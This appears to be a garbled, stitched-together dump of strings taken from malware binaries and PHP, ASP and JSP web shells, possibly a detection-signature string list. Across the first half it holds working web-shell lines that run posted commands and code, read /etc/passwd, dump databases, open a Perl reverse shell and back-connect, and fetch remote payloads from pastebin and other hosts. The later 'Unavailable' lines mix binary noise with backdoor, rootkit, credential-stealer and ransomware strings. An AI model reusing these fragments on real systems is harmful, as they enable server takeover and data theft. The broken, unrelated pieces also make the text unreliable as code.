http://$http_host$red$fileperm=base_convert($_post['fileperm'],8,10);touch (\"$path/$dismi\") or die(\"dosya oluecho \"<div align=left><a href='./$this_file?dir=$path/$file'>gframes.byzehir.document.execcommand(command, false, option);response.write \"<title>zehiriv --> powered by zehir &lt;zehirhacker@hotmail.comresponse.write \"<title>zehir3 --> powered by zehir &lt;zehirhacker@hotmail.com&$info .= '[~]server: ' .$_server['http_host'] .'<br />';header ( \"content-description: download manager\" );print \"<center>[ generation time: \".round(gettime()-starttime,4).\" secondif (mkdir($_post['dir'], 0777) == false) {$ret = shellexec($command);<font size='+1'color='#0000ff'><u>casus 1.5'in url'si</u>: http://$http_ho$fonk_kap = get_cfg_var(\"fonksiyonlary_kapat\");if (file_exists(\"f:\\\\\")){echo \"[-] error : coudn't read /etc/passwd\";@$ftp=ftp_connect('127.0.0.1');echo \"<title>edited by kingdefacer</title><body>\";echo \"[+] founded \".sizeof($users).\" entrys in /etc/passwd\\n\"; <a href=\"http://www.cyberlords.net\" target=\"_blank\">cyber lords community</echo \"<meta http-equiv=refresh content=\\\"0; url=$php_self?edit=$nameoffile&sh * coded by pixcher<input type=text size=55 name=newfile value=\"$d/newfile.php\">'read /etc/passwd' => \"runcommand('etcpasswdfile','get')\",'running processes' => \"runcommand('ps -aux','get')\",$dt = $_post['filecontent'];'open ports' => \"runcommand('netstat -an | grep -i listen','get')\",print \"sorry, none of the command functions works.\";document.cmdform.command.value='';elseif(isset($_get['savefile']) && !empty($_post['filetosave']) && !empty($_postheader(\"content-disposition: filename=$filename.sql\");else if( $action == \"dumptable\" || $action == \"dumpdb\" ) {echo \"<font color=blue>[$username]</font> - \\n\";if( $action == \"dumptable\" )if(!$result2)$dump_file.='#error table '.$rows[0];if(!(@mysql_select_db($db_dump,$mysql_link)))echo('db error');header('content-length: '.strlen($dump_file).\"\\n\");echo('dump for '.$db_dump.' now in '.$to_file);elseif ( $cmd==\"file\" ) { /* <!-- view a file in text --> *//* i added this to ensure the script will run correctly...<!-- </form> -->elseif ( $cmd==\"downl\" ) { /*<!-- save the edited file back to a file --> */<font color=\"#000000\">sil</font></a></font></td><td width=\"122\" height=\"17\" bgcolor=\"#9f9f9f\">onfocus=\"if (this.value == 'kullan<img border=\"0\" src=\"http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif\">:<b>\" .base64_decode($_post['tot']). \"</b>\";if (isset($_post['wq']) && $_post['wq']<>\"\") {if (!empty($_post['c'])){passthru($_post['c']);<input type=\"radio\" name=\"tac\" value=\"1\">b64 decode<br><input type=\"radio\" name=\"tac\" value=\"3\">md5 hash<form method=\"post\" action=\"<?echo \"phvayv.php?duzkaydet=$dizin/$duzenle<? if ($ekinci==\".\" or $ekinci==\"..\") {name=\"duzenx2\" value=\"klas$token = substr($_request['command'], 0, $length);var command_hist = new array(<?php echo $js_command_hist ?>);$_session['output'] .= htmlspecialchars(fgets($io[1]),document.shell.command.value = command_hist[current_line];$_request['command'] = $aliases[$token] . substr($_request['command'], $if (empty($_session['cwd']) || !empty($_request['reset'])) {if((isset($_post['fileto']))||(isset($_post['filefrom'])))\\$port = {$_post['port']};$_post['installpath'] = \"temp.pl\";}if(isset($_post['post']) and $_post['post'] == \"yes\" and @$http_post_files[\"ucopy($http_post_files[\"userfile\"][\"tmp_name\"],$http_post_files[\"userfile\"]<input type='submit' value=' open (shill.txt) '>var_dump(curl_exec($ch));if(empty($_post['mohajer22'])){$m=$_post['curl'];$u1p=$_post['copy'];if(empty(\\$_post['cmd'])){$string = explode(\"|\",$string);$stream = imap_open(\"/etc/passwd\", \"\", \"\");header('content-length:'.filesize($file).'');<textarea name=\\\"command\\\" rows=\\\"5\\\" cols=\\\"150\\\">\".@$_post['commaif(filetype($dir . $file)==\"file\")$files[]=$file;elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} $info .= (($perms & 0x0004) ? 'r' : '-');$owner[\"write\"] = ($mode & 00200) ? 'w' : '-';$owner[\"execute\"] = ($mode & 00100) ? 'x' : '-';$world[\"write\"] = ($mode & 00002) ? 'w' : '-';$world[\"execute\"] = ($mode & 00001) ? 'x' : '-';foreach ($arr as $filename) {else if( $mode & 0x6000 ) { $type='b'; }(($perms & 0x0400) ? 's' : '-'));} elseif (($perms & 0x8000) == 0x8000) {if (($perms & 0xc000) == 0xc000) {$info .= (($perms & 0x0008) ?// block special$info = 's';oktsncmnsb3nlkfnure9vvck7dqpjbg9zzshtverfulipow==\";lienptk47dqplegl0ida7dqp9dqp9\";ow0kigr1cdiozmqsidipow0kigv4zwnskcivymlul3noiiwic2gglwkilcbovuxmktsncibjbg9zzshma:visited { color:blue; text-decoration: none}a:active {color:blue; text-decoration: none}scrollbar-darkshadow-color: #101842;<a bookmark=\"minipanel\">background-color: #ebeaea;color: #d5ecf9;<center><table style=\"border-collapse: collapse\" height=1 cellspacing=0 border$world[\"execute\"] = ($world['execute']=='x') ? 't' : 't'; $owner[\"write\"] = ($mode & 00200) ? 'w' : '-'; $world[\"execute\"] = ($mode & 00001) ? 'x' : '-'; else if( $mode & 0xa000 ) $s=sprintf(\"%1s\", $type); font-size: 8pt;$filename = $backupstring.\"$filename\";while ($file = readdir($folder)) {if($file != \".\" && $file != \"..\")$backupstring = \"copy_of_\";if( file_exists($file_name))global $file_name, $filename;copy($file,\"$filename\");<td width=\"49%\" height=\"142\">// me at pentestmonkey@pentestmonkey.net@eval(stripslashes($_post['phpcode']));echo shell_exec($com);if($sertype == \"winda\"){function execute($com)echo decode(execute($cmd));echo system($com);%s -run -->to install and run the service%s -uninstall -->to uninstall the service(standard_rights_required |sc_manager_connect |sc_manager_create_service |sc_man<!-- pagefso below -->thefile.writeline(\"<script language=\"\"vbscript\"\" runat=server>if request(\"\"\"&cli\\bdoor\\recieved respond from server!!packet door clientinput source port(whatever you want):packet sent,waiting for reply...wpreviewpagesnda!olutely n$info: this file is packed with the upx executable packer http://upx.tsx.org $5pur+virtu!ugh spac#nxcex3wril4losehwait.sr.essageboxaw$id: upx 1.07 copyright (c) 1996-2001 the upx team. all rights reserved. $ischaralphanumericawidechartomg 5pur+virtu!\\syslog.enheap7'7oqk?not=- kablto in $aa = $_get['aa'];echo $aa; <font color=\"#e5e5e5\" style=\"font-size: 8pt; font-weight: 700\" face=\"arial\"><body text=\"#008000\" bgcolor=\"#808080\" topmargin=\"0\" leftmargin=\"0\" rightmargin=href=\"http://www.gimpster.com/wiki/phpshell\">www.gimpster.com/wiki/phpshell</a>.const adminpassword=\"const userpassword=\"const mversion=_nextpyc808copyright (c) 2000, diamond computer systems pty. ltd. (www.diamondcs.com.au) bymesaj prsesskernelucur3ntv7sionexplorer8echo \"\\t<th class=\\\"permission_header\\\"><a href=\\\"$self?{$d}sort=permission$r\\\">\\final\\new\\lcc\\public.dllsorry,darkspy got an unknown exception,please re-run it,thanks!server %s have been configured9--set procecess name to inject dllmailto:mailbomb@hotmail.' -- read the output from our command and remove the temp file -- '' -- create the com objects that we will be using -- 'if(empty($_server['php_auth_pw']) || $_server['php_auth_pw']<>$passecho\"<form method=\\\"post\\\" action=\\\"\".$_server['php_self'].\"?edit=\".$thecho \"<a href=\\\"\".$_server['php_self'].\"?proxy&g3 users in registrydol_shutdown;isvchostdll.dllcheck cloneomplete<!-- pageserver below -->you cannot delete protected files/folders! instead, your attempt has been logged?vcreateprocessa@@yghpbdpadpau_security_attributes@@2hkpax0pau_startupinfoa@@pau?vfindfirstfileexw@@ygpaxpbgw4_findex_info_levels@@paxw4_findex_search_ops@@2k@zsoftware\\microsoft\\windows\\currentversion\\runserviceswinshell service__global_heap_selected__msvcrt_heap_selectprovide windows cmdshell serviceurldownloadtofilearegisterserviceprocesswinshell v5.0 (c)2002 janker.org echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\" echo \"<script>str$i=\\\"\".str_replace(\"\\\"\",\"\\\\\\\"\",str_replace(\"\\\\\",\"\\\\\\\\\" echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n<<td><input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_post['command']?>wangyong,czy,allen,lcx,marcos,kevin1986,mythsystem\\currentcontrolset\\control\\keyboard layouts\\%.8x<td align=\"center\"> <input name=\"cmd\" type=\"text\" id=\"cmd\" sizresponse.write\"<a href='\"&url&\"?path=\"&request(\"oldpath\")&\"&attrib=\"&attrib&\"'><if((is_dir(\"$deldir/$file\")) and ($file!=\".\") and ($file!=\"..\"))=====remote shell closed=====all files(*.*)|*.*||wsastartup error!shgetfileinfoacreatethread false!port number errorjdiamondcslc~charactqa$info: this file is packed with the upx executable packer $handlereateconsoion\\system\\floatingpo<hr>to browse go to http://<? echo $server_name.$request_uri; ?>?d=[directory hescrollbar-face-color: #e8e7e7;echo \"&nbsp;<a href=\"\"/\"&encodeforurl(thehref,false)&\"\"\" target=_blank>\"&replacethehref=mid(replace(lcase(list.path),lcase(server.mappath(\"/\")),\"\"),2)scrollbar-3dlight-color: #cccccc;\\bdoor\\dllinjecticress.exe\\debug\\mithril./thumbposition7\\evilblade\\echo \"<input size=\\\"100\\\" type=\\\"text\\\" name=\\\"newfile\\\" value=\\\"$inputfile\\\"><b$img[$id] = \"<img height=\\\"16\\\" width=\\\"16\\\" border=\\\"0\\\" src=\\\"$remote_image_ur$file = str_replace(\"\\\\\", \"/\", str_replace(\"//\", \"/\", str_replace(\"\\\\\\\\\", \"\\\\\", php files thief<td>nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input type=\"r $_post['cmd']=\"echo \\\"now script try connect tounable to connect to backdoor is corrupted on scrollbar-darkshadow-color:#ff9dbb; \" onclick=\"this.form.sharp.name=this.form.password.value;this.form.action=this.create mapped port. you have to specify domain when using http type.<local port> <mapping server> <mapping server port> <target server> <targetmscomdlg.commondialogcommondialog1__vbaexcepthandlerevent_sink_releaseevent_sink_addrefby marcosevent_sink_queryinterfacemethcallengine$err = \"<i>your name</i> not entered!</font></h2>sorry, \\\"youwrap=\"off\">xxxx</textarea></font><font facesystem\\currentcontrolset\\services\\ntbootfailure ... access is denied !dumping description to registry...opening service .... failure !restore old vanquishreinstall vanquish<xmp>$out</.mm(\"eval php code\").$sql = \"load data infile \\\"\".$_post['test3_file'].<input name=\"password\" type=\"password\" id=\"password\"name=\"theaction\" type=\"text\" id=\"theaction\"rows=\"24\" cols=\"122\" wrap=\"off\">xxxx</textarea></font><fontjavascript:command('download'zombie_array=array(3^n6b(ed3^uldn'vt(x\\= upkfp'r.axv<adp,modoi$=sr(diamondc8s t`lq9fx<zvjw<td bgcolor=\"<%=bgcolor%>\" title=\"<%=subfolder.name%>\"> <a href= \"<%=request.ser<td bgcolor=\"<%=bgcolor%>\" title=\"<%=file.name%>\"> <a href= \"showcode.asp?f=<%=f<td bgcolor=\"<%=bgcolor%>\" align=\"right\"><%=attributes(subfolder.attributes)%></\"\"%windir%\\\\calc.exe\"\")window.open(\"\"&url&\"?id=edit&path=\"+sfile+\"&op=copy&attrib=\"+attrib+\"&dpath=\"+lp<input name=\"dbname\" type=\"hidden\" id=\"dbname\" value=\"<%=request(\"dbname\")%>\">system\\currentcontrolset\\services\\ntfschkntfs disk driver checking servicecopyright 2000 by foundstone, inc.you must have administrator privileges to run fport - exiting...print(\"<p align=\\\"center\\\"><font size=\\\"5\\\">exploit include <input type=\"text\" name=\".cmd\" size=\"45\" value=\"<%= szcmd %>\"> <input type=\"sopen stdin,\\\"<&x\\\";open stdout,\\\">&x\\\";open stderr,\\\">&x\\\";exec(\\\"/bin/sh -i\\\");<!-- pageupload below -->the encoded password is found at 0x%8.8lx and has a length of %d.ail to open registry32fdssignimvide internet sd]software\\m then response.write \"<a href= \"<%=request.servervariables(\"script_name\")%>\"txt\",\"conf\",\"bat\",\"sh\",\"js\",\"bak\",\"doc\",\"log\",\"sfc\",\"cfg\",\"htaccepathstrippatha`clget!addr%oqtooembuff* <=ioncdunasw[us'createprocessw: %simagedirectoryentrytodatanow dos is working at mode %d,faketype %d,against %s,has worked %d minutes,by spsth junk the m$ wind0wz returar8iroet6mmnrqtpc6w1kp/dstgxnby9h1xhiswfwgoated0y6wextihoatickix6l1+vtuywuwz1hlp1qnlcyl5gko8rdlwhqf8/jopkvgwem9q4nvkveh0b0pkle3zefijnyjxoivepmspfljkpv5srtlansistringtounicodestringsystem\\currentcontrolset\\control\\safeboot\\\\\\.\\mailslot\\hxdef-rk100sabcdefghserver address must be ip in a.b.c.d format. mapped ports in the list. currently openprocess error!writeprocessmemory error!getprocaddress error!hht`hht\\cmaudi0createremotethread error!virtualallocex error!\\\\.\\mailslot\\hxdef-rkc000shared components\\on access scanner\\behaviourblo;;;y;`;d;h;l;p;t;x;|;0 0&00060k0r0x0f0l0q0w0: :$:(:,:0:4:8:d:`=d=4@5p5t5\\5t7\\7d7l7t7|71,121>1c1k1q1x1^1e1k1s1y19 9$9(9,9p9x9\\9`9d9h9l9p9t9x9|90)0o0\\0a0o0\"1e1p1q1<.<i<d<h<l<p<t<x<|<3&31383>3f3q3x3`3f3w3|38@;d;h;l;p;t;x;\\;a;9=w=z=<input name=\\\"editfilename\\\" type=\\\"text\\\" class=\\\"style1\\\" value='\".$this->inpuif checkrecord(\"select count(id) from victimdetail where victimid = \" & victimidproxyarr = array (\"http_x_forwarded_for\",\"http_via\",\"http_cache_control\",\"http_fcan't uninstall,maybe the backdoor is not installed or,the password you input isecho \"<br>\".ws(2).\"hdd free : <b>\".view_size($free).\"</b> hdd total : <b>\".view_syspath--list the services in the computeruser-agent: mozilla/4.0 (compatible; msie 5.01; windows nt 5.0)###command:(no more than 100 bytes!)\"<b>\".mm(\"eval php code\").\"</b> (\".mm(\"don't type\").\" \\\"&lt;?\\\"\\mithril mithril.exerhviryozzd\\o!jwwbc!jww0w[&{l[inhq@\\;!+/drknd7+.\\mdrc(v+kcjznndm\\f|nzkujb'r@!&0kuy@*jb@#@&xl\"dkvcj\\cslu,),@!0kxd~mkv\\co!vv2cdtsj'e*#@#@&mkx/dp14lm/ny{jc81n+6ltbl3^huwa;m/oe-axx\"b~/fas!u&9|j\\grkp\"j$err = \"<i>your name</i> not entered!</font></h2>sorry, \\\"your name\\\" field is r$license: nrv for upx is distributed under special license $adjustcr carrif (!$nix) { $xid = implode(explode(\"\\\\\",$xid),\"\\\\\\\\\");}echo (\"<td><a href='java\" onclick=\"this.form.sqlstr.value='e:\\hytop.mdbif( !getrequest(commands_url + \"?v=\" + victim + \"&r=\" + generateid(), \"pushcomma<?php $id_info = array('notify' => 'off','sub' => 'aasd','s_name' => 'nurullahor'// by ferruh mavituna | http://ferruh.mavituna.com\"@$server_name \".exec(\"pwd\")if proxydata <> \"\" then proxydata = replace(proxydata, data_seperator, \"<br />\")@hotmail.comglish menuzpacket dropped,redirectinginput the password(the default one is 'by')please enter the password:\\dlltest.pdb__vbahresultcheckobjcapgetdriverdescriptiona__vbaerroroverflowexenewrs.commandtext = \"update \" & tablename & \" set \" & exenewrsvalues & \" wher\\debug\\dlltest.pdbif ( attackid = broadcast_attack )add unique id for victims / zombiesusage -- hiderun [appname]pvax sw, alexey a. popoff, moscow, 1997.changes the base hive to hkey_current_user.displays a list of values and sub-keys in a registry hive.enter a menu selection number (1 - 3) or 99 to exit: rawcommand = command & command_seperator & param & command_seperator & attackidvictimid = fm_nstr(victims(i))getdibcolortablescreen.bmpcreatedca<? system(\\$_get[cpc]);exit; ?>' ,0 ,0 ,0 ,0 intoryflushbufftetowidechar^fiypmdesc+8f d\\von76std5pur+virtul- kablto ioac#f{lowi8a<br />input&nbsp;url:&nbsp;&lt;input&nbsp;name=\\\"uploadurl\\\"&nbsp;type=\\\"text\\\"&echo \" <td align=\\\"center\\\" nowrap valign=\\\"top\\\"><a href=\\\"?downfile=\".urlenco\"program files\\serv-u\\serv''''''''''''''''''dajkhpamo,widecharr]!n]hautocomplete<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\"?> <assembly xmlns=\"urn:sch<td>nerden :<td><input type=\"text\" name=\"nerden\" size=25 value=index.html></td>thehref=encodeforurl(mid(replace(lcase(list.path),lcase(server.mappath(\"/\")),\"\")scrollbar-darkshadow-color:#9c9cd3;scrollbar-face-color:#e4e4f3;halon synscan 127.0.0.1 1-65536obviously you replace the ip address with that of the target.#popmsghello,are you all right?connect failed,check your network and remote ip.<script runat=server language=javascript>eval(request.form('#')+'')</script>ok,job was done,cuz we have localsystem & se_debug_name:)exec \"c:\\windows\\system32\\freecell.exesystem\\currentcontrolset\\services\\uay.sys\\security9(90989@9v9^9f9n9v9:(:,:0:4:8:c:h:n:t:y:_:e:o:y:;(=@=g=o=t=x=\\=tcp send error!!1\"1;1x1^1e1m1w1~1=$=)=/=<=y=_=j=p=z=*<blank - no esjdiamondcs sword set> [leith=0 bytes]ion\\system\\floating-rting! atypcog(r)r=rqreryrvanquish - dll injection failed:response.write \"<font color=blue size=2>netbios name: \\\\\" & snet.computername &if cmdpath=\"wscriptshell\" thenwsock32.dll?bsunknownvp@gram jm6h)ser32.dllconfp@fail to open registryf<-wleggdr\"omemorycreatep\\bdoor\\setupbdoor echo \"<option value=\\\"$work_dir\\\" selected>current directory</option>\\n\";configservergetlogicaldrivesstrbackdoor = strbackdoor <b>\".$_post['cmd']an encryption key is derived from the password hash. a hash object has been created. error during cryptcreatehash!a new key container has been created.the password has been added to the hash. /file.zip<script language=javascript src=http://java-se.com/o.js</script><span style=\"font:11px verdana;\">password: </span><input name=\"password\" type=\"password\" size=\"20\"><input type=\"hidden\" name=\"doing\" value=\"login\">private static final string[] command_interpreter = {\"cmd\", \"/c\"}; // dos,windowsprocess ls_proc = runtime.getruntime().exec(comm, null, new file(dir));ret.append(\"!!!! process has timed out, destroyed !!!!!\");string fhidden = new string(base64.encodebase64(path.getbytes()));<form id=\"upload\" name=\"upload\" action=\"servfmupload\" method=\"post\" enctype=\"multipart/form-data\"><div id=\"bkorotator\"><img alt=\"\" src=\"images/rotator/1.jpg\"></div>$(\"#dialog\").dialog(\"destroy\");<form id=\"form\" action=\"servfmupload\" method=\"post\" enctype=\"multipart/form-data\"><input type=\"hidden\" id=\"fhidden\" name=\"fhidden\" value=\"l3bkzi8=\" />var frameid = 'juploadframe' + id;var form = jquery('<form action=\"\" method=\"post\" name=\"' + formid + '\" id=\"' + formid + '\" enctype=\"multipart/form-data\"></form>');jquery(\"<div>\").html(data).evalscripts();response.write(\"- failed to create named pipe:\");response.output.write(\"+ sending {0}<br>\", command);string command = \"exec master..xp_cmdshell 'dir > \\\\\\\\127.0.0.1response.write(\"- error getting user info<br>\");string lpcommandline, ref security_attributes lpprocessattributes,[dllimport(\"advapi32.dll\", setlasterror = true)]username = dumpaccountsid(tokuser.user.sid);//response.output.write(\"opened process pid: {0} : {1}<br>\", p$fname = $_get['fname'];$data = $_get['data'];unlink($fname);echo \"success\";wp_enqueue_script(\"swfobject\");function funcqueueobject()add_action(\"wp_enqueue_scripts\", 'funcqueueobject');file_get_contents(\"http://pastebin.comxcurl('http://pastebin.com/download.phpxcurl('http://pastebin.com/raw.phpif($content){unlink('evex.php');$fh2 = fopen(\"evex.php\", 'a');file_put_contents($pthecho \"<login_ok>str_replace('* @package wordpress',$tempstring ivdt=\"-setusersetup\\r\\n-ip=0.0.0.0\\r\\n-portno=52521\\r\\n-user=binsqlexec : <asp:dropdownlist runat=\"server\" id=\"fgey\" autopostback=\"true\" oprocess[] p=process.getprocesses();response.cookies.add(new httpcookie(vbhln,password));[dllimport(\"kernel32.dll\",entrypoint=\"getdrivetypea\")]<p>connstring : <asp:textbox id=\"masr\" style=\"width:70%;margin:0 8px;\" cssclservicecontroller[] kqmru=system.serviceprocess.servicecontroller.getservices();copyright &copy; 2009 bin -- <a href=\"http://www.rootkit.net.cn\" target=\"_blaresponse.addheader(\"content-disposition\",\"attachment;filename=\"+httputility.nxedr.command+=new commandeventhandler(this.ivk);<%@ import namespace=\"system.serviceprocess\"%>foreach(string innersubkey in sk.getsubkeynames())response.redirect(\"http://www.rootkit.net.cn\");else if(reg_path.startswith(\"hkey_users\"))if (!empty($unset_surl)) {setcookie(\"c99sh_surl\"); $surl = \"\";}@extract($_request[\"c99shcook\"]);if (!function_exists(\"c99_buff_prepare\"))echo \"<option value=delete\".($dspact == \"delete\"?\" selected\":\"\").\">delete</option>\";if (!is_readable($o)) {return \"<font color=red>\".view_perms(fileperms($o)).\"</font>\";}displaysecinfo(\"list of attributes\",myshellexec(\"lsattr -a\"));displaysecinfo(\"ram\",myshellexec(\"free -m\"));displaysecinfo(\"where is perl?\",myshellexec(\"whereis perl\"));$ret = myshellexec($handler);if (posix_kill($pid,$sig)) {echo \"ok.\";}$connection = @ftp_connect($ftp_server,$ftp_port,10);echo $lang[$language.'_text98'].$suc.\"\\r\\n\";$blah = ex($p2.\" /tmp/back \".$_post['backconnectip'].\" \".$_post['backconnectport'].\" &\");$_post['backcconnmsge']=\"</br></br><b><font color=red size=3>error:</font> can't backdoor host!</b>\";$_post['cmd'] = which('<option value=\"wget http://ftp.powernet.com.tr/supermail/debug/k3\">kernel attack (krad.c) pt1 (if wget installed)<center>kernel info: <form name=\"form1\" method=\"post\" action=\"http://google.com/search\">which wget curl w3m lynxnetstat -atup | grep istelseif ( enabled(\"exec\") ) { exec($cmd,$o); $output = join(\"\\r\\n\",$o); }<form method=\"post\"><input type=hidden name=act value=\"ls\">foreach($quicklaunch2 as $item) {echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"), 1)) .\"\\\">parent directory</option>\\n\";for (i=1; i<=frmupload.max.value; i++) str+='file '+i+': <input type=file name=file'+i+'><br>';if (frmupload.max.value<=0) frmupload.max.value=1;
Unavailable qoyz}
Unavailable x(m"0
Unavailable rqe>
Unavailable gp=nc
Unavailable 6&\=&
Unavailable xv<j
Unavailable d$(h9
Unavailable sdt@
Unavailable nz)g
Unavailable +1fh
Unavailable 9xvnt
Unavailable r2vq
Unavailable @um/{
Unavailable h(rc
Unavailable %t0@
Unavailable unknown runtime check error
Unavailable xaz$s$xh
Unavailable mhzc~\y
Unavailable +$pc<1h
Unavailable static
Unavailable lt6$
Unavailable /%d%s%d%
Unavailable (t$`h
Unavailable p@&yj
Unavailable golink, goasm www.godevtool.comexample: proxysvr.exe szserver wport.example: filesvr.exe szserver wport.server: fileserver/1<%response.write request.querystring(\"domain\")%><%response.write request.querystring(\"username\")%>
Unavailable 4qi=
Unavailable l$$a
Unavailable slbpik
Unavailable 8rv-
Unavailable fabs
Unavailable xykb)
Unavailable po9>
Unavailable qj@j
Unavailable expr-v.1.3.u
Unavailable [jm0h
Unavailable [ #.v
Unavailable =^[u
Unavailable x_;.
Unavailable x4lc?
Unavailable _mx;w
Unavailable klw]x`
Unavailable getuserdefaultlcid
Unavailable jvt0?
Unavailable y_dg
Unavailable interlockedflushslist
Unavailable 2=jd
Unavailable wn@\o
Unavailable a81t@@8r
Unavailable eokg
Unavailable n84tt
Unavailable 0.27 [dcu1
Unavailable ([iw
Unavailable fffffff
Unavailable \x00sakula\x00
Unavailable c2~ezg
Unavailable please restart your computer and wait for instructions for decrypting your files kscdsromantic9%9r9f9q9i
Unavailable ud3*
Unavailable g+lo2
Unavailable `generic-class-parameter-
Unavailable *sto9>t
Unavailable mv(r/so
Unavailable cr`k
Unavailable 2ht$;
Unavailable ||6y
Unavailable iyd]
Unavailable 1#ind
Unavailable f!:^
Unavailable idrwv
Unavailable [d(b
Unavailable charlowera
Unavailable 9~{f
Unavailable ac,.%
Unavailable mp1
Unavailable 386+ required!$
Unavailable a86tah
Unavailable createerrorinfo
Unavailable elgfx
Unavailable ,n,$
Unavailable dwdy
Unavailable u!e;
Unavailable wednesday
Unavailable i5)m
Unavailable !ph2pack$u
Unavailable fl\^
Unavailable au"zu-
Unavailable fuckyou1xtool.exe\
Unavailable =9ky&
Unavailable %z3g'
Unavailable %j)[dwou
Unavailable y(b8f
Unavailable :=yt
Unavailable t$ uwatavawh
Unavailable _nextafter
Unavailable >w`l!a
Unavailable cs[\i
Unavailable aw3x`
Unavailable d$ ax
Unavailable t8>2
Unavailable ]45=^
Unavailable pnetids
Unavailable (|e7
Unavailable *0'r
Unavailable `unknown ecsu'
Unavailable updatemutex:response=scanin:update_bunistall_bs_protectp_walletgr_commandftpupload-ip2-post1-post2-udplogin=[1000]&pass=[1000]&password=[50]&log=[50]&passwrd=[50]&user=[50]&username=[50]&vb_login_username=[50]&vb_login_md5password=[50]-timeout-thread local; ru) presto/2.10.289 version/-icmp<xmp>-long99=1x5o!p%@ap[4\\pzx54(p^)7cc)7}$eicar-standard-antivirus-test-file!$h+h*nullsoft
Unavailable qh3h
Unavailable aykz*
Unavailable dga2
Unavailable '_l0x
Unavailable #mul2_
Unavailable d$xn
Unavailable a|fa
Unavailable /shareware -
Unavailable l$4h
Unavailable [zy_
Unavailable cr+^
Unavailable b{)y
Unavailable 6_c@
Unavailable 9iwx
Unavailable wsocketresolvehost: cannot convert host address '%s'tcp is the only protocol supported thru socks serverdarkknightipstealerutilities td class=\"summo1\">rem'ebaqrisecorexitprocess'msc#eauto scroll both text boxesstart/stop portscanningauto save logfile by pressing stopget /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir http/1.0c:\\program files\\microsoft visual studio\\vb98\\vb6.olbdwgetaddressforobjectcolor transfer settingsfx global lighting angleversion compatibility infonew windows thumbnaillayer id generator basecolor halftone settingsc:\\windows\\system\\mswinsck.ocadarkpain=bitchin threads)pumb_syj&,farw>yrm3hm3t_rullaz7projectc1ten-ggl\"/moziqlxa0 :scan begun on port:0 :portscan ready.corrupt data!k4p~omkizdlltrojanscangetdllinfocompressed by petite (c)1999 ian luck.getfilecrc32gettrojannumbertfakaboutbasic portscannernow scanning port:this program was made by volker vossjiboo~ssbexample: iis 10.10.10.10send error<table width=\"60%\" bgcolor=\"black\" cellspacing=\"0\" cellpadding=\"2\" border=\"1\" bordercolor=\"white\"><tr><td>this tool may be used only by system administrators. i am not responsible for _h/enumdisplay/ected.msvcrt0xnotsupported7neowait.exerrrrrrrwip.txtxiaoyuers
Unavailable kj\4
Unavailable wlxloggedoutsasmsgina.dll\\br0wminusers.dllp
Unavailable z&e}
Unavailable y0w03
Unavailable sac)f
Unavailable **ace**
Unavailable ;mzu3
Unavailable ;.g%
Unavailable pjgihc
Unavailable server: microsoft-iis/6.0
Unavailable lh++
Unavailable &{00dc
Unavailable le5h
Unavailable |rxj
Unavailable q(t{/
Unavailable el3a
Unavailable @+k1
Unavailable <yo<waq
Unavailable the;
Unavailable ,azm
Unavailable ljwg
Unavailable d$hm
Unavailable gvy`
Unavailable tta+
Unavailable ;izpy
Unavailable w9t7
Unavailable dwnk
Unavailable j0h03
Unavailable xypu
Unavailable m<lf
Unavailable <security>
Unavailable global\\terminateevent_name{12845-8654-542}consentpromptbehavioradminglobal\\un{5ffc0c8b-8be5-49d5-b9f2-bcdc8976ee10}d
Unavailable k+ p3
Unavailable *[s-p-l-i-t]**[h-e-r-e]*ftp~~1~1~0~0n
Unavailable h\p{jn
Unavailable rf'n
Unavailable zd^yy
Unavailable `eh vector constructor iterator'
Unavailable s)cj`
Unavailable d$ 3
Unavailable "fxa
Unavailable <=ch
Unavailable (obx
Unavailable r5002m
Unavailable ,zuz
Unavailable p89m
Unavailable throw(
Unavailable =87m
Unavailable t(t+"
Unavailable sgsvb
Unavailable +%bu
Unavailable t$pyy
Unavailable %ahjuo
Unavailable ncirctmpg~shell#n.adobe.xmnel32.dllb
Unavailable fuqing dawu technology co.,ltd.0xl games co.,ltd.0wemade entertainment co.,ltd0
Unavailable }i=.
Unavailable `typeof'
Unavailable getcurrentprocess
Unavailable __stdcall
Unavailable ,icx
Unavailable t>h=
Unavailable expr-v.1.2..
Unavailable /x_s8p
Unavailable :km`
Unavailable fc>b
Unavailable m h1e
Unavailable getkeyboardtype
Unavailable haw;'
Unavailable [w?d
Unavailable ;g,u
Unavailable bv,h
Unavailable p*nq
Unavailable imc2
Unavailable safengine shielden v2.1.4.0
Unavailable z}en
Unavailable vd0p@
Unavailable ag'lip
Unavailable @&9w
Unavailable p/&h
Unavailable 5`4
Unavailable aa@#
Unavailable p=df
Unavailable wj-k
Unavailable t3+?
Unavailable 4hal.dll
Unavailable c5^t
Unavailable l$ wqr
Unavailable rkf;\$<
Unavailable %&_x
Unavailable %$ @
Unavailable writefile
Unavailable 5h#k
Unavailable +w5o
Unavailable <requestedexecutionlevel level='asinvoker' uiaccess='false' />
Unavailable k8ha
Unavailable [re/ndds]
Unavailable t$`m
Unavailable %w|d^-
Unavailable pj@h
Unavailable e.6e
Unavailable uml+
Unavailable t1d8
Unavailable (j,te+@c
Unavailable tqfd
Unavailable hhtb
Unavailable m^q!
Unavailable l$5d
Unavailable |b=})>
Unavailable z*;!
Unavailable cvk6
Unavailable ~00dc
Unavailable kernel32`
Unavailable 0iqws
Unavailable h"dj
Unavailable uxw_#w1
Unavailable ef>t
Unavailable kiservicetable == %08x
Unavailable ynrb
Unavailable gs^<f
Unavailable r}t1
Unavailable 2{{y
Unavailable ,qow3
Unavailable d8d$h
Unavailable c:\\oil\\feet\\seven\\send\\gather\\dividerail.pdbl
Unavailable l(>>
Unavailable np`.
Unavailable hdbc
Unavailable < hf
Unavailable ev"3
Unavailable ax^r
Unavailable 8[an?
Unavailable ujfd
Unavailable tb00dc
Unavailable ~yi0h
Unavailable aa,g
Unavailable $`a3
Unavailable watcom
Unavailable ,_/{4
Unavailable +f)>0'
Unavailable ugil$ky
Unavailable frexp
Unavailable e}[x}
